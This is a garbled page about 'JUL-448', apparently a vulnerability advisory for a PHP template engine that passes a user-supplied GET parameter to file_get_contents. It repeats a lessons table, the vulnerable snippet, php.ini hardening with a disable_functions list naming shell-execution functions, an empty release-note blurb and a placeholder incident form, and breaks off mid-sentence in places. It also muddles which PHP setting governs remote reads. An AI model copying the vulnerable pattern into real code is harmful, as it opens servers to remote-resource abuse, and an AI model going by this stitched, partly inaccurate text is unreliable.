Jul-448

| Lesson | Takeaway | |------------|--------------| | Never trust configuration defaults | allow_url_include is Off in PHP 8.x, but many legacy stacks shipped it as On. Audits must verify that security‑sensitive directives are locked down. | | Input validation must be defensive | Even if a feature “should” be used internally, never expose raw user input to functions that can interpret remote streams. | | Static analysis + runtime testing | Modern SAST tools now flag file_get_contents($userInput) when allow_url_include is enabled. Pair that with integration tests that mock remote URLs. | | Rapid Patch Distribution | The Julius team’s three‑day turnaround from disclosure to patch is commendable. Open‑source maintainers should adopt a security‑first release cadence for critical CVEs. | | Dependency hygiene | Regularly run composer outdated / npm audit and automate upgrades in CI pipelines. The longer you stay on an old minor version, the larger the attack surface. |

In Julius 4.3–4.7 the TemplateEngine class loads user‑provided templates using PHP’s file_get_contents() function, without proper sanitisation when allowUrlInclude is enabled.

// src/Engine/TemplateEngine.php (v4.5)
public function render(string $templatePath, array $data = []): string
// $templatePath comes from a GET parameter `tpl`
    $raw = file_get_contents($templatePath); // ← vulnerable line
    return $this->compile($raw, $data);

When allowUrlInclude is ON, file_get_contents() can fetch any URL, including php:// wrappers. An attacker can therefore supply a URL that points to a malicious PHP stream wrapper or a remote server that returns a crafted payload. JUL-448

If you cannot upgrade right now, apply the runtime configuration hardening:

; php.ini
allow_url_include = Off          ; <— disables remote includes
allow_url_fopen = Off            ; optional, blocks remote file reads
disable_functions = exec,shell_exec,system,passthru,proc_open,pcntl_exec

Restart the PHP-FPM/Apache service after editing. | Lesson | Takeaway | |------------|--------------| | Never

JUL-448 represents a targeted update in our ongoing efforts to improve reliability and performance. As a focused revision, JUL-448 introduces streamlined processes, clearer specifications, and tighter compatibility with existing systems.

Key highlights:

If you’re responsible for integrations, review the JUL-448 specification and run the provided compatibility tests. For questions or migration support, reach out to the project team or consult the documentation.

| Detail | Information | |--------|-------------| | Incident ID | JUL‑448 | | Reported by | [name/department] | | Date/Time first observed | [timestamp] | | Detection method | Monitoring alert (Grafana/Datadog), user reports, etc. | | Initial severity rating | [e.g., Sev‑2 – High] | | Service Level Agreement (SLA) impact | [e.g., 2‑hour breach] | In Julius 4

| Lesson | Takeaway | |------------|--------------| | Never trust configuration defaults | allow_url_include is Off in PHP 8.x, but many legacy stacks shipped it as On. Audits must verify that security‑sensitive directives are locked down. | | Input validation must be defensive | Even if a feature “should” be used internally, never expose raw user input to functions that can interpret remote streams. | | Static analysis + runtime testing | Modern SAST tools now flag file_get_contents($userInput) when allow_url_include is enabled. Pair that with integration tests that mock remote URLs. | | Rapid Patch Distribution | The Julius team’s three‑day turnaround from disclosure to patch is commendable. Open‑source maintainers should adopt a security‑first release cadence for critical CVEs. | | Dependency hygiene | Regularly run composer outdated / npm audit and automate upgrades in CI pipelines. The longer you stay on an old minor version, the larger the attack surface. |

In Julius 4.3–4.7 the TemplateEngine class loads user‑provided templates using PHP’s file_get_contents() function, without proper sanitisation when allowUrlInclude is enabled.

// src/Engine/TemplateEngine.php (v4.5)
public function render(string $templatePath, array $data = []): string
// $templatePath comes from a GET parameter `tpl`
    $raw = file_get_contents($templatePath); // ← vulnerable line
    return $this->compile($raw, $data);

When allowUrlInclude is ON, file_get_contents() can fetch any URL, including php:// wrappers. An attacker can therefore supply a URL that points to a malicious PHP stream wrapper or a remote server that returns a crafted payload.

If you cannot upgrade right now, apply the runtime configuration hardening:

; php.ini
allow_url_include = Off          ; <— disables remote includes
allow_url_fopen = Off            ; optional, blocks remote file reads
disable_functions = exec,shell_exec,system,passthru,proc_open,pcntl_exec

Restart the PHP-FPM/Apache service after editing.

JUL-448 represents a targeted update in our ongoing efforts to improve reliability and performance. As a focused revision, JUL-448 introduces streamlined processes, clearer specifications, and tighter compatibility with existing systems.

Key highlights:

If you’re responsible for integrations, review the JUL-448 specification and run the provided compatibility tests. For questions or migration support, reach out to the project team or consult the documentation.

| Detail | Information | |--------|-------------| | Incident ID | JUL‑448 | | Reported by | [name/department] | | Date/Time first observed | [timestamp] | | Detection method | Monitoring alert (Grafana/Datadog), user reports, etc. | | Initial severity rating | [e.g., Sev‑2 – High] | | Service Level Agreement (SLA) impact | [e.g., 2‑hour breach] |